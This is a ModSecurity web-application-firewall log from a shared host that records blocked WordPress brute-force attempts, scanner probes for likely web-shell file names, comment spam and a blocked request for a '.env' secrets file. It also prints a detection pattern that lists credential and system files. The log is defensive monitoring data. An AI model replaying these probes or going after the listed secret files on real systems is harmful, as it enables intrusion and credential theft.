[Tue May 26 15:42:52.955237 2026] [security2:error] [pid 733610:tid 733793] [client 103.133.24.243:43796] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyJMLL_4PasUNKBsfiYQAAADU"]
[Tue May 26 15:42:53.700550 2026] [security2:error] [pid 733610:tid 733789] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyJcLL_4PasUNKBsficwAAADE"]
[Tue May 26 15:42:54.575175 2026] [security2:error] [pid 733610:tid 733859] [client 103.153.130.62:60398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyJsLL_4PasUNKBsfimwAAAHc"]
[Tue May 26 15:42:54.575312 2026] [security2:error] [pid 733610:tid 733859] [client 103.153.130.62:60398] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyJsLL_4PasUNKBsfimwAAAHc"]
[Tue May 26 15:42:55.022879 2026] [security2:error] [pid 733610:tid 733826] [client 4.228.83.111:3564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/public/css.php"] [unique_id "ahVyJ8LL_4PasUNKBsfiqAAAAFY"]
[Tue May 26 15:42:55.022969 2026] [security2:error] [pid 733610:tid 733826] [client 4.228.83.111:3564] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/public/css.php"] [unique_id "ahVyJ8LL_4PasUNKBsfiqAAAAFY"]
[Tue May 26 15:42:55.415312 2026] [security2:error] [pid 733610:tid 733786] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyJ8LL_4PasUNKBsfipwAAAC4"]
[Tue May 26 15:42:57.117998 2026] [security2:error] [pid 733610:tid 733742] [client 4.228.83.111:40990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/alfa.php"] [unique_id "ahVyKcLL_4PasUNKBsfi5AAAAAI"]
[Tue May 26 15:42:57.118115 2026] [security2:error] [pid 733610:tid 733742] [client 4.228.83.111:40990] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/alfa.php"] [unique_id "ahVyKcLL_4PasUNKBsfi5AAAAAI"]
[Tue May 26 15:42:58.170665 2026] [security2:error] [pid 733610:tid 733834] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyKcLL_4PasUNKBsfi8QAAAF4"]
[Tue May 26 15:42:59.033979 2026] [security2:error] [pid 733610:tid 733703] [remote 82.196.25.136:40120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVyKsLL_4PasUNKBsfjEQAAClw"]
[Tue May 26 15:42:59.220598 2026] [security2:error] [pid 733610:tid 733802] [client 136.116.219.71:61749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.219.116.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVyK8LL_4PasUNKBsfjFwAAAD4"]
[Tue May 26 15:42:59.220802 2026] [security2:error] [pid 733610:tid 733802] [client 136.116.219.71:61749] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVyK8LL_4PasUNKBsfjFwAAAD4"]
[Tue May 26 15:42:59.639578 2026] [security2:error] [pid 733610:tid 733833] [client 136.116.219.71:57423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.219.116.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVyK8LL_4PasUNKBsfjLQAAAF0"]
[Tue May 26 15:42:59.639682 2026] [security2:error] [pid 733610:tid 733833] [client 136.116.219.71:57423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVyK8LL_4PasUNKBsfjLQAAAF0"]
[Tue May 26 15:42:59.856094 2026] [security2:error] [pid 733610:tid 733822] [client 4.228.83.111:40998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/css.php"] [unique_id "ahVyK8LL_4PasUNKBsfjNAAAAFI"]
[Tue May 26 15:42:59.856226 2026] [security2:error] [pid 733610:tid 733822] [client 4.228.83.111:40998] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/css.php"] [unique_id "ahVyK8LL_4PasUNKBsfjNAAAAFI"]
[Tue May 26 15:43:00.172329 2026] [security2:error] [pid 733610:tid 733814] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyK8LL_4PasUNKBsfjMAAAAEo"]
[Tue May 26 15:43:01.044097 2026] [security2:error] [pid 733610:tid 733821] [client 185.191.171.10:39134] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVyLcLL_4PasUNKBsfjWQAAAFE"]
[Tue May 26 15:43:01.044224 2026] [security2:error] [pid 733610:tid 733821] [client 185.191.171.10:39134] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVyLcLL_4PasUNKBsfjWQAAAFE"]
[Tue May 26 15:43:01.531366 2026] [security2:error] [pid 733610:tid 733766] [client 4.228.83.111:40993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/classwithtostring.php"] [unique_id "ahVyLcLL_4PasUNKBsfjZQAAABo"]
[Tue May 26 15:43:01.531467 2026] [security2:error] [pid 733610:tid 733766] [client 4.228.83.111:40993] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/classwithtostring.php"] [unique_id "ahVyLcLL_4PasUNKBsfjZQAAABo"]
[Tue May 26 15:43:02.265239 2026] [security2:error] [pid 733610:tid 733788] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyLcLL_4PasUNKBsfjcgAAADA"]
[Tue May 26 15:43:03.587994 2026] [security2:error] [pid 733610:tid 733857] [client 17.241.219.162:35734] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyLsLL_4PasUNKBsfjfAAAdWg"]
[Tue May 26 15:43:04.138143 2026] [security2:error] [pid 733610:tid 733761] [client 154.195.153.232:25491] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "154.195.153.232" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyL8LL_4PasUNKBsfjpAAAABU"], referer: https://www.cagmedya.com/
[Tue May 26 15:43:04.347054 2026] [security2:error] [pid 733610:tid 733745] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyL8LL_4PasUNKBsfjqwAAAAU"]
[Tue May 26 15:43:04.724501 2026] [security2:error] [pid 733610:tid 733795] [client 4.228.83.111:40994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/aa.php"] [unique_id "ahVyMMLL_4PasUNKBsfjuwAAADc"]
[Tue May 26 15:43:04.724650 2026] [security2:error] [pid 733610:tid 733795] [client 4.228.83.111:40994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/aa.php"] [unique_id "ahVyMMLL_4PasUNKBsfjuwAAADc"]
[Tue May 26 15:43:05.114804 2026] [security2:error] [pid 733610:tid 733851] [client 154.195.108.171:57981] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "154.195.108.171" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyMMLL_4PasUNKBsfjvQAAAG8"], referer: https://www.cagmedya.com/
[Tue May 26 15:43:05.139775 2026] [security2:error] [pid 733610:tid 733747] [client 103.153.130.62:60738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyMMLL_4PasUNKBsfjyAAAAAc"]
[Tue May 26 15:43:05.139968 2026] [security2:error] [pid 733610:tid 733747] [client 103.153.130.62:60738] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyMMLL_4PasUNKBsfjyAAAAAc"]
[Tue May 26 15:43:05.194706 2026] [security2:error] [pid 733610:tid 733798] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyMcLL_4PasUNKBsfjzAAAADo"]
[Tue May 26 15:43:05.989826 2026] [security2:error] [pid 733610:tid 733751] [client 154.196.80.232:27755] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "154.196.80.232" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyMcLL_4PasUNKBsfj3QAAAAs"], referer: https://www.cagmedya.com/
[Tue May 26 15:43:06.092474 2026] [security2:error] [pid 733610:tid 733817] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyMsLL_4PasUNKBsfj5wAAAE0"]
[Tue May 26 15:43:06.285329 2026] [security2:error] [pid 733610:tid 733760] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyMcLL_4PasUNKBsfj4wAAABQ"]
[Tue May 26 15:43:07.180545 2026] [security2:error] [pid 733610:tid 733778] [client 166.1.186.201:59927] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "166.1.186.201" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyMsLL_4PasUNKBsfj-AAAACY"], referer: https://www.cagmedya.com/
[Tue May 26 15:43:07.341824 2026] [security2:error] [pid 733610:tid 733827] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyM8LL_4PasUNKBsfkAgAAAFc"]
[Tue May 26 15:43:07.720777 2026] [security2:error] [pid 733610:tid 733801] [client 4.228.83.111:35251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/0x.php"] [unique_id "ahVyM8LL_4PasUNKBsfkDQAAAD0"]
[Tue May 26 15:43:07.720888 2026] [security2:error] [pid 733610:tid 733801] [client 4.228.83.111:35251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/0x.php"] [unique_id "ahVyM8LL_4PasUNKBsfkDQAAAD0"]
[Tue May 26 15:43:08.397901 2026] [security2:error] [pid 733610:tid 733746] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyM8LL_4PasUNKBsfkFAAAAAY"]
[Tue May 26 15:43:08.594213 2026] [security2:error] [pid 733610:tid 733861] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyNMLL_4PasUNKBsfkIQAAAHk"]
[Tue May 26 15:43:09.026341 2026] [security2:error] [pid 733610:tid 733755] [client 4.228.83.111:3574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/k.php"] [unique_id "ahVyNcLL_4PasUNKBsfkLwAAAA8"]
[Tue May 26 15:43:09.026444 2026] [security2:error] [pid 733610:tid 733755] [client 4.228.83.111:3574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/k.php"] [unique_id "ahVyNcLL_4PasUNKBsfkLwAAAA8"]
[Tue May 26 15:43:09.391202 2026] [security2:error] [pid 733610:tid 733754] [client 166.1.186.201:6409] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "166.1.186.201" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyNcLL_4PasUNKBsfkPgAAAA4"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 15:43:09.842754 2026] [security2:error] [pid 733610:tid 733802] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyNcLL_4PasUNKBsfkTAAAAD4"]
[Tue May 26 15:43:10.114561 2026] [security2:error] [pid 733610:tid 733800] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyNcLL_4PasUNKBsfkSAAAADw"]
[Tue May 26 15:43:10.670243 2026] [security2:error] [pid 733610:tid 733746] [client 154.196.80.232:1917] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "154.196.80.232" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyNsLL_4PasUNKBsfkYwAAAAY"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 15:43:11.082421 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:44120] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyNsLL_4PasUNKBsfkaQAAAHQ"]
[Tue May 26 15:43:11.098473 2026] [security2:error] [pid 733610:tid 733795] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyN8LL_4PasUNKBsfkcgAAADc"]
[Tue May 26 15:43:11.233533 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:44120] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyNsLL_4PasUNKBsfkaQAAAHQ"]
[Tue May 26 15:43:11.233578 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:44120] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyNsLL_4PasUNKBsfkaQAAAHQ"]
[Tue May 26 15:43:11.244590 2026] [security2:error] [pid 733610:tid 733791] [client 4.228.83.111:41012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/o.php"] [unique_id "ahVyN8LL_4PasUNKBsfkfQAAADM"]
[Tue May 26 15:43:11.244696 2026] [security2:error] [pid 733610:tid 733791] [client 4.228.83.111:41012] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/o.php"] [unique_id "ahVyN8LL_4PasUNKBsfkfQAAADM"]
[Tue May 26 15:43:11.333812 2026] [security2:error] [pid 733610:tid 733837] [client 154.195.153.232:13695] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "154.195.153.232" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyN8LL_4PasUNKBsfkfgAAAGE"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 15:43:11.954992 2026] [security2:error] [pid 733610:tid 733822] [client 176.65.139.237:26642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.arborvitae.in"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVyN8LL_4PasUNKBsfkkAAAAFI"]
[Tue May 26 15:43:12.207229 2026] [security2:error] [pid 733610:tid 733797] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyN8LL_4PasUNKBsfkiwAAADk"]
[Tue May 26 15:43:12.353659 2026] [security2:error] [pid 733610:tid 733843] [client 17.241.219.163:33866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVyOMLL_4PasUNKBsfknAAAAGc"]
[Tue May 26 15:43:12.499955 2026] [security2:error] [pid 733610:tid 733772] [client 166.1.186.201:44097] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "166.1.186.201" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVyOMLL_4PasUNKBsfkpgAAACA"], referer: https://www.cagmedya.com/wp-login.php?action=register
[Tue May 26 15:43:14.855861 2026] [security2:error] [pid 733610:tid 733624] [remote 74.7.241.58:50098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVyOsLL_4PasUNKBsflZAAAdw0"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Frontend
[Tue May 26 15:43:14.950252 2026] [security2:error] [pid 733610:tid 733825] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyOsLL_4PasUNKBsflXwAAAFU"]
[Tue May 26 15:43:15.427282 2026] [security2:error] [pid 733610:tid 733797] [client 103.133.24.243:44180] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyO8LL_4PasUNKBsflbwAAADk"]
[Tue May 26 15:43:15.464171 2026] [security2:error] [pid 733610:tid 733797] [client 103.133.24.243:44180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyO8LL_4PasUNKBsflbwAAADk"]
[Tue May 26 15:43:15.797796 2026] [security2:error] [pid 733610:tid 733772] [client 103.153.130.62:61080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyO8LL_4PasUNKBsflegAAACA"]
